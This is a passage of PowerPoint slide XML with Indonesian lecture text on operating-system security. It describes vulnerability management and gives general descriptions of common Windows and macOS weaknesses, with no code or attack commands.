              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> toko </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeraskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Microsoft Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kalangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penginstalannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Perusahaan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>padanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> macOS Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UNIX-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proses booting yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Apple macOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>popularitasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumbuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, macOS </a:t>
